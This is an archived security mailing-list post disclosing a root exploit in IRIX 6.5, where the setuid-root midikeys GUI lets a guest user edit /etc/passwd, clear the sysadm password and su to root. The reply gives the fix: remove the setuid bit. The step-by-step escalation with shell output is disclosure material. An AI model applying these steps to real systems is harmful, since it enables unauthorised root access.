[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

IRIX :midikeys root exploit.



Solution: turn off the setuid bit on midikeys for irix.

"Larry W. Cashdollar" wrote:
> 
> Aleph1,
>         Please forgive me if this has already been on this list. I searched
> geek-girl with no luck.  I have been auditing our IRIX boxes and found what I
> believe to be a new vulnerability.
> 
>         On IRIX 6.5 systems (IRIX Release 6.5 IP28 )
>         # uname -a
>         IRIX64 devel 6.5 05190004
> 
>         The setuid root binary midikeys can be used to read any file on the
> system using its gui interface.  It can also be used to edit anyfile on the
> system.  I was able to get from guest account access to root access using the
> following procedure.
> 
> 
>         1) Choose an unpassworded account and telnet in. I like guest or lp.
> 
>         devel 25% id
>         uid=998 gid=998(guest)
> 
>         2) Execute the midikeys application with display set to your host.
> 
>         devel 26% ./midikeys
>         devel 27% Xlib:  extension "GLX" missing on display "grinch:0.0".
>         Xlib:  extension "GLX" missing on display "grinch:0.0".
> 
>         3) under the midikeys window click sounds and then midi songs. This will
>         open a file manager type interface.
> 
>         4) You can enter the path and filename of files you which to read.
>             including root owned with group/world read/write permissions unset.
> 
>         5) If you select a file like "/usr/share/data/music/README" it will
>         appear in a text editor.  Use the text editor to open /etc/passwd and
>         make modifications at will. Save and enjoy.
> 
> So I removed the '*' from sysadm...
> 
> $ su sysadm
> # id
> uid=0(root) gid=0(sys)
> 
> devel 28%  ls -l /usr/sbin/midikeys
> -rwsr-xr-x    1 root     root      218712 Jan 10 17:19 /usr/sbin/midikeys
> 
> 
>         I have tested this on 2 IRIX 6.5 hosts with success. A patch exists for
>         startmidi and stopmidi buffer overflows.
> 
>         More info on previous patch:
>         ftp://sgigate.sgi.com/security/19980301-01-PX).
> 
>         However, I didnt find any for midikeys.
> 
> 
>         -- Larry W. Cashdollar
>            UNIX/Security Operations.
>            Computer Sciences Corporation.
>